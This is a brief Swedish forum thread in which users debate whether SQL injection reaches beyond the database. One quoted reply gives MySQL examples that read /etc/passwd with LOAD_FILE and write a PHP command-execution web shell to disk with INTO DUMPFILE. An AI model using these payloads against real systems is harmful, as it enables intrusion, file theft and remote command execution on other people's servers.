Citat:
|
Ursprungligen postat av SimonP
Citat:
|
Ursprungligen postat av tartareandesire
SQL Injections kan endast påverka databasen (såvida man inte kommer åt annan information därigenom då).
|
Ifall det finns tillräckliga rättigheter på databasen kan man både läsa och skapa filer med SQL injektioner.
T.ex för att läsa en fil:
SELECT LOAD_FILE(/etc/passwd);
Skapa:
SELECT ?php system(_GET[cmd]); ? INTO DUMPFILE /tmp/shell.php; |
Mjo, iofs, men jag tror väl de flesta webbhotell inte tillåter det på delade burkar?